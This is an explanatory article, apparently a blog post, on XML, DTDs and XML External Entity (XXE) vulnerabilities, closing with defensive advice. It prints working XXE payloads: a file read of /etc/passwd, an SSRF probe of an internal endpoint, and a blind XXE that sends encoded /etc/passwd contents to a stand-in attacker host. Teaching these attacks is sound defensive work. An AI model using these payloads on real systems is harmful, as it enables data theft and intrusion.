XML is a markup language like HTML and is widely used to store and transmit structured data. It consists of elements (tags), attributes, and character data. See example:

<?xml version="1.0" encoding="UTF-8"?>
<message id="1">
  <to>John</to>
  <from>Mary</from>
  <heading>Reminder</heading>
  <body>Don't forget to call me!</body>
</message>

The first line is called declaration and is not part of the structured data. The following lines are the static structure of one message.

The whole problem starts when the content of an XML is interpreted. What makes it dynamic also makes it dangerous!

XSLT (Extensible Stylesheet Language Transformations) is a language used to transform and format XML documents:

  • An attacker can inject, modify, or extract sensitive data in XML documents.
  • A crafted XML file can expand entities to inject external resources, leading to an XML External Entity (XXE) vulnerability.

DTDs (Document Type Definitions) define the structure and the legal elements and attributes of an XML document.

  • It declares what entities and attributes are allowed in the document that is used to validate data integrity before processing.
  • This feature can be maliciously leveraged with the usage of the keyword SYSTEM to reference an external declaration, which can be file paths or URLs.
  • In other words, it can allow malicious data or code injection. See examples below.

(1) Arbitrary file read:

<!DOCTYPE foo [<!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<config>
&xxe;
</config>

(2) Server-Side Request Forgery (SSRF):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://localhost:8080/internal-endpoint">]>
<config>
&xxe;
</config>

(3) Blind XXE:

<!ENTITY % cmd SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % blind "<!ENTITY exfil SYSTEM 'http://malicious.com/?exfil=%cmd;'>">
%blind;
<!DOCTYPE foo SYSTEM "http://malicious.com/attack.dtd">
<config>
&exfil;
</config>

XXE Vulnerability

  • In-Band
    • Allows to exfiltrate data from a target.
  • Out-of-Band (blind)
    • It requires additional resources to exfiltrate data, such as DNS queries or HTTP requests to a host controlled by the attacker.
  • Denial-of-Service (DoS)
    • Attackers can cause DoS by abusing the expansion with excessively large or recursive entities.

Considerations

  • XML Parsers should allow the minimum amount of interpretation of their content because anything can be misused, like External Entities and DTDs.
  • Prefer using CSV or JSON (preferably) over XML when possible.
  • Vulnerabilities are typically a result of misconfiguration, bad code practices, and poor restrictions.